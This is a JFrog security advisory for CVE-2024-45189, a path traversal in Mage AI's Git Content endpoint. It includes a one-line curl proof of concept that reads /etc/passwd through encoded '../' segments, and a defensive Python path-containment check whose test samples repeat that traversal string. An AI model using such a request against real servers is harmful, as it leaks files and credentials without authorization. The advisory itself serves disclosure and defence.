JFrog Security Research

JFSA-2024-001039604 - Mage AI git content request remote arbitrary file leak

CVE-2024-45189 | CVSS 6.5

JFrog Severity: medium

Discovered by Ori Hollander of the JFrog Security Research Team

Published 23 Aug, 2024 | Last updated 23 Aug, 2024

Mage AI git content request remote arbitrary file leak

mage-ai

(,)

Mage AI allows remote users with the "Viewer" role to leak arbitrary files from the Mage server due to a path traversal in the "Git Content" request.

curl -X GET 'http://localhost:6789/api/git_file/..%2F..%2Fetc%2Fpasswd?api_key=<USER API KEY>' -H 'Authorization: Bearer <USER TOKEN>'
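
A server-side containment check for this class of bug, as an added example that is not Mage AI's code or its fix. The names `resolve_inside`, `PathTraversalError`, `check_samples` and the temporary `repo` directory are hypothetical, and the sample inputs are constructed around the request path shown above.

```python
import tempfile
from pathlib import Path
from urllib.parse import unquote


class PathTraversalError(ValueError):
    """Requested path resolves outside the allowed base directory."""


def resolve_inside(base_dir, requested):
    """Map a URL path segment to a file path guaranteed to stay under base_dir."""
    base = Path(base_dir).resolve()
    # Decode in case the segment is still percent-encoded (..%2F -> ../).
    decoded = unquote(requested)
    if "\x00" in decoded:
        raise PathTraversalError("NUL byte in path")
    # resolve() collapses ".." and follows symlinks, so the check sees the real
    # target. An absolute `decoded` replaces base in the join and is rejected too.
    candidate = (base / decoded).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        raise PathTraversalError(f"{requested!r} resolves outside {base}") from None
    return candidate


def check_samples():
    """Run constructed inputs through resolve_inside; return {input: verdict}."""
    samples = [
        "README.md",                   # ordinary file in the repository
        "pipelines%2F..%2FREADME.md",  # ".." that stays inside the repository
        "..%2F..%2Fetc%2Fpasswd",      # path segment from the advisory's request
        "%2Fetc%2Fpasswd",             # absolute path
        "link%2Fsecret.txt",           # symlink inside the repo pointing outside it
    ]
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        repo = Path(tmp) / "repo"      # hypothetical repository root
        outside = Path(tmp) / "outside"
        (repo / "pipelines").mkdir(parents=True)
        outside.mkdir()
        (repo / "README.md").write_text("constructed sample\n")
        (repo / "link").symlink_to(outside)
        for s in samples:
            try:
                resolve_inside(repo, s)
                results[s] = "allowed"
            except PathTraversalError:
                results[s] = "rejected"
    return results
```

The handler should open the path returned by `resolve_inside`, not the raw request string, so the file that is read is the one that was checked.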

No mitigations are supplied for this issue

No references are supplied for this issue
